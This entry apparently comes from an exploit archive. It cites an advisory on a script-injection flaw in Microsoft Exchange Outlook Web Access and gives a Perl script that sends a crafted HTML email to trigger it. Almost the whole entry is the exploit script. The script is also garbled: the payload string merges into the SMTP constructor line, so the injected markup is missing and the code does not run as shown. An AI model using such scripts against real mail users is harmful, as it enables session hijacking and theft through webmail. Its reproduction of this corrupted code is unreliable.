source: https://www.securityfocus.com/bid/18381/info Microsoft Exchange Server Outlook Web Access is prone to a script-injection vulnerability. A remote attacker can exploit this issue by sending a malicious email message to a vulnerable user. #!/usr/bin/perl use Net::SMTP; my $to = "recipient\@domain.tld"; my $sub = "Watch out - Cross Site Scripting Attack"; my $from = "originator\@domain2.tld"; my $smtp = "mail.example.tld"; my $cont = "hugo\0abcnew($smtp); $smtp->mail("$from") || die("error 1"); $smtp->to("$to") || die("error 2"); $smtp->data() ; $smtp->datasend("To: $to\n") ; $smtp->datasend("From: $from\n") ; $smtp->datasend("Subject: $sub\n"); $smtp->datasend("Content-Type: text/html\n\n"); $smtp->datasend("$cont") ; $smtp->datasend("\n\n") ; $smtp->dataend() ; $smtp->quit() ; print "$cont\n\ndone\n";